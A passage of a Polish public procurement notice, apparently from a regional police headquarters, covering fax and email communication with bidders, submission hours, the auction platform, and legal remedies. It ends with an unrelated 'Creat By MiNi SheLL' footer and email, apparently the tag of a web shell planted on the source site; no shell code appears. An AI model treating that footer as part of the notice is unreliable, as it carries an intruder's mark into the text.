przypadku zaniechania odebrania przekazanej poczty Wykonawca ponosi wszelkie wynikające z tego skutki.
Zamawiający nie wymaga potwierdzenia otrzymania przekazywanego pisma drogą elektroniczną. W
przypadku wyboru przez Wykonawcę jako drogi otrzymywania pism nadawanych przez Zamawiającego
drogą faksową Wykonawca ponosi odpowiedzialność za sprawdzenie kompletności i czytelności otrzymania
przesłanego pisma. Brak kompletności lub czytelności Wykonawca niezwłocznie zgłasza Zamawiającemu
telefonicznie na nr 32 200-20-50. Za dowód skutecznego przesłania pisma do Wykonawcy drogą faksową
Zamawiający uznaje potwierdzenie przesłania faksowego OK na numer podany przez Wykonawcę na
formularzu ofertowym i wykazany na potwierdzeniu faksowym. Zamawiający nie wymaga potwierdzenia
otrzymania przekazywanego pisma drogą faksową. Wykonawca zobowiązany jest do powiadomienia
Zamawiającego w przypadku zmiany numeru telefonu, faksu lub adresu poczty elektronicznej, na który
Zamawiający ma przesyłać pisma. W przypadku nie dokonania powiadomienia Zamawiającego, przesłanie
pisma na numer faksu lub adres poczty elektronicznej wskazany na wniosku zgodnie z zasadami
wskazanymi w niniejszym punkcie uważa się za skutecznie dokonane. Zaproszenia do udziału w licytacji
zostaną przekazane faxem i potwierdzone pocztą. 3. Przesyłanie wszelkich informacji, oświadczeń,
zaświadczeń drogą faksową i elektroniczną może odbywać się tylko w dniach urzędowania Komendy (od
poniedziałku do piątku w godzinach 7.30-15.30) na numer 032 200 20 60 lub e-mail:
zamowienia@ka.policja.gov.pl. UWAGA: W przypadku przesłania dokumentu po godzinie 15.30 w dniu
roboczym spowoduje, iż zostanie on zarejestrowany u Zamawiającego jako złożony w następnym dniu
roboczym. W przypadku przesłania dokumentu w dniu wolnym od pracy zostanie on zarejestrowany u
Zamawiającego jako złożony w pierwszym następującym dniu roboczym. fax. 032 2002060, e mail:
zamowienia@ka.policja.gov.pl 4. Od momentu otwarcia do momentu zamknięcia licytacji Zamawiający i
Wykonawcy wszelkiego rodzaju wnioski,oświadczenia i inne informacje przekazują drogą elektroniczną za
pośrednictwem platformy licytacyjnej; wiadomości przekazywane Wykonawcom będą widoczne w zakładce
moje wiadomości POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH
WYKONAWCY W TOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA. Wykonawcy w toku
postępowania o udzielenie zamówienia przysługują środki ochrony prawnej określone w dziale VI ustawy
Prawo Zamówień Publicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com